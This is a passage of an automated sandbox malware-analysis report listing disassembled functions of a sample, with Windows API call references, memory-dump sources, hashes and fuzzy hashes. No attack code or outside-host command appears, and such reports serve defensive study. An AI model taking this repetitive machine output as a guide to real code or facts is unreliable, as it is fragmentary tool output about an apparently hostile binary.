                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: SendString$_memmove
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 2279737902-1007645807
                      • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                      • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                      • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                      • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                      Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                      • String ID: 0.0.0.0
                      • API String ID: 208665112-3771769585
                      • Opcode ID: 5b309dc600144d10cd4df96da033064f68b25cba8dfa7e2b119ea905bdd96dc3
                      • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                      • Opcode Fuzzy Hash: 5b309dc600144d10cd4df96da033064f68b25cba8dfa7e2b119ea905bdd96dc3
                      • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                      Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • timeGetTime.WINMM ref: 00464F7A
                        • Part of subcall function 0042049F: timeGetTime.WINMM(?,76C1B400,00410E7B), ref: 004204A3
                      • Sleep.KERNEL32(0000000A), ref: 00464FA6
                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                      • SetActiveWindow.USER32 ref: 0046500B
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                      • Sleep.KERNEL32(000000FA), ref: 00465043
                      • IsWindow.USER32 ref: 0046504F
                      • EndDialog.USER32(00000000), ref: 00465060
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                      • String ID: BUTTON
                      • API String ID: 1194449130-3405671355
                      • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                      • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                      • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                      • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                      Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • CoInitialize.OLE32(00000000), ref: 0046D5EA
                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                      • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                      • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                      • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                      • _memset.LIBCMT ref: 0046D7E1
                      • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                      • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                      • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                      • String ID:
                      • API String ID: 1246142700-0
                      • Opcode ID: d199858874c66e9e4f3753e20070a5963f56ec606f14660cdbbc09dbb01e0176
                      • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                      • Opcode Fuzzy Hash: d199858874c66e9e4f3753e20070a5963f56ec606f14660cdbbc09dbb01e0176
                      • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                      Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 0045C283
                      • GetWindowRect.USER32(00000000,?), ref: 0045C295
                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                      • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                      • GetWindowRect.USER32(00000000,?), ref: 0045C310
                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                      • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                      • GetWindowRect.USER32(00000000,?), ref: 0045C383
                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                      • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                      • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                      • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                      • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                      Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                      • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                      • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                      • DeleteObject.GDI32(00000000), ref: 0043BD1C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                      • String ID:
                      • API String ID: 641708696-0
                      • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                      • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                      • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                      • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                      Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                      • GetSysColor.USER32(0000000F), ref: 004021D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ColorLongWindow
                      • String ID:
                      • API String ID: 259745315-0
                      • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                      • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                      • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                      • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                      Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                      Download Yara Rule
                      APIs
                      • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                      • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                      • _wcscpy.LIBCMT ref: 0046A9FF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharDriveLowerType_wcscpy
                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                      • API String ID: 2820617543-1000479233
                      • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                      • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                      • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                      • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                      Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 0048716A
                      • CreateMenu.USER32 ref: 00487185
                      • SetMenu.USER32(?,00000000), ref: 00487194
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                      • IsMenu.USER32(?), ref: 00487237
                      • CreatePopupMenu.USER32 ref: 00487241
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                      • DrawMenuBar.USER32 ref: 00487276
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                      • String ID: 0$F
                      • API String ID: 176399719-3044882817
                      • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                      • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                      • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                      • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                      Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                      Download Yara Rule
                      APIs
                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                      • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                      • SelectObject.GDI32(00000000,00000000), ref: 00487580
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                      • DeleteDC.GDI32(00000000), ref: 00487594
                      • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                      • String ID: static
                      • API String ID: 2559357485-2160076837
                      • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                      • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                      • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                      • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                      Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00426E3E
                        • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                      • __gmtime64_s.LIBCMT ref: 00426ED7
                      • __gmtime64_s.LIBCMT ref: 00426F0D
                      • __gmtime64_s.LIBCMT ref: 00426F2A
                      • __allrem.LIBCMT ref: 00426F80
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                      • __allrem.LIBCMT ref: 00426FB3
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                      • __allrem.LIBCMT ref: 00426FE8
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                      • __invoke_watson.LIBCMT ref: 00427077
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                      • String ID:
                      • API String ID: 384356119-0
                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                      • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                      • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                      Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00462542
                      • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                      • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                      • Sleep.KERNEL32(000001F4), ref: 004625EB
                      • GetMenuItemCount.USER32(?), ref: 0046262F
                      • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                      • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                      • GetMenuItemID.USER32(?,?), ref: 004626BA
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                      • String ID:
                      • API String ID: 4176008265-0
                      • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                      • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                      • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                      • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                      Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                      • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                      • _memset.LIBCMT ref: 00486FDD
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$LongWindow_memset
                      • String ID:
                      • API String ID: 830647256-0
                      • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                      • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                      • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                      • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                      Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                      • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                      • VariantInit.OLEAUT32(?), ref: 00456C2A
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                      • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                      • VariantClear.OLEAUT32(?), ref: 00456CC6
                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                      • VariantClear.OLEAUT32(?), ref: 00456CEE
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                      Memory Dump Source
